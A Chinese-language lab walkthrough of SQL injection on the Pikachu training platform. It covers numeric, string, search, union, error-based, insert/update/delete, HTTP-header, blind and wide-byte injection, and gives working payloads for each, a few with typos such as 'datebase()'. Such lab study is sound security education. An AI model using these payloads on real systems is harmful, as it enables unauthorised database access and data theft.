sql注入
数据库注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄露的一种漏洞。
sql注入攻击流程
1. 注入点探测
自动方式:使用web漏洞扫描工具,自动进行注入点发现s
手动方式:手工构造sql inject测试语句进行注入点发现
2. 信息获取
通过注入点取得期望得到的数据
1. 环境信息:数据库类型,数据库版本,操作系统版本,用户信息等
2. 数据库信息:数据库名称,数据库表,表字段,字段内容(加密内容破解)
3. 获取权限 获取操作系统权限:通过数据库执行shell,上传木马
Get方式中使用url提交注入数据;post方式中使用抓包工具修改post数据部分提交注入
数字型注入(post)
首先选择数字1 ,点击查询
由于是post型,所以我们抓包,做一下修改,修改为恒成立 id=1 or 1=1
将其发送到Repeater,点击Go
可以看到Render里取出了数据库中全部数据,说明存在数字型注入漏洞。
可以看下源码,这里没有做任何处理
字符型注入(get)
我们先输入kobe
因为是字符型的注入,我们可以使用做sqli-labs方法进行尝试(参考sqli-labs的方法,几乎每一关都用),加单引号、双引号、括号、以及他们的组合这里需要注意闭合后面注释 最后我们试出来是单引号
kobe' or 1=1#
搜索型注入
我们先输入一个字母k
可以查看一下源码(路径如图所示)
可以看到,这里用了搜索的sql语句:select username ,id ,email from member where username like '%$name%'
用了一个like ‘%xxxx%’, 同样的道理,可以选择闭合sql语句:k%' or 1=1#
成功闭合,所有数据显示出来
xx型注入
相同的道理,只是数据包过形式不同
可以查看源码(路径如下)也可以自己尝试出来
所以构造 k') or 1=1#
联合查询
我们在sqli-labs中用到过多次联合查询的语句,下面来回顾一下(以xx注入类型为例)
判断字段数 a') order by 2#(数字可以改变,判断出来字段数为2)
查库 a') union select database(),2# (查到数据库为pikachu)
查表 a') union select table_schema,table_name from information_schema.tables where table_schema='pikachu'#
查询users表中的字段名: a') union select table_name,column_name from information_schema.columns where table_name='users'#
联合查询得到用户名和密码:a') union select username,password from users#
insert/updata注入(报错注入)
点击注册
条件:后台没有屏蔽报错信息
常用函数:updatexml() exactvalue() floor()(取整函数)
基于insert/update下的报错
1' or updatexml(1,concat(0x7e,datebase()),0) or'
基于delete下的报错
1' or updatexml(1,concat(0x7e,datebase()),0)
基于exactvalue()
kobe' and extractvalue(0,concat(0x7e,version()))#
构造语句 1' or updatexml(1,concat(0x7e,database()),0) or'
密码必填可以随意输
得到皮卡丘的数据库名字是 pikachu
update注入
先登录进去,使用lucy/123456 然后在修改信息的框中直接填入语句即可,payload和insert的相同
1' or updatexml(1,concat(0x7e,database()),0) or'
得到皮卡丘的数据库名字是 pikachu
delete注入
基于delete下的报错
1 or updatexml(1,concat(0x7e,datebase()),0)
删除的时候设置代理,抓包
将其发送到Repeater,然后改包,将id后面的数字改掉
由于是get的类型的 在payload记得进行url编码
payload 在上面已经提到
1 or updatexml(1,concat(0x7e,database()),0)
编码之后,可以看到空格变为了加号,点击Go
得到数据库pikachu
http header 注入
原理:有时候后台开发人员为了验证客户信息(比如cookie验证)或者通过http header头信息获取客户端的一些信息,比如useragent、accept字段等 会对客户端的http header信息进行获取并使用sql进行处理,如果此时没有足够的安全考虑则可能会导致基于http header 的sql inject漏洞。
首先登陆 admin/123456
发现有对头部信息的获取,所以可能存在注入
抓包,发送到Repeater
修改user-agent 将信息改为 firefox' or updatexml(1,concat(0x7e,database()),0) or '
得到数据库为pikachu
基于boolean盲注(布尔盲注)
表现:
1.没有报错信息
2.结果都只显示两种情况(0或1)
3.在正确的输入下,输入and 1=1/and 1=2可以判断
实际上需要自己一个一个测试出来
输入 Kobe’ and ascii(substr(database(),1,1))>113#
Kobe’ and ascii(substr(database(),1,1))=112#
获取表名
test payload:
kobe' union select table_schema,table_name from information_schema.tables where table_schema='pikachu'#
获取字段名
kobe' union select table_name,column_name from information_schema.columns where table_name='users'#
基于时间的盲注
Kobe' and sleep(5)# 页面会延迟五秒
kobe' and if ((substr(database(),1,1))='a',sleep=(5),null)#
1ms就返回结果 说明不是 "a" 改为”p”不返回 一直到确定数据库的全称。
宽字节注入
当我们输入有单引号时被转义为’,无法构造 SQL 语句的时候,可以尝试宽字节注入。
GBK编码中,反斜杠的编码是 “%5c”,而 “%df%5c” 是繁体字 “連”。在皮卡丘平台中,将利用 BurpSuite 截获数据包,发送到 Repeater 中,在里面写入payload,当我们用通常的测试 payload时,是无法执行成功的
因为在后台单引号会被转义,在数据库中执行多了反斜杠,可以使用下面的payload,在单引号前面加上%df,绕过这个WAF。
kobe %df' or 1=1#
我们构造sql查询语句就可以了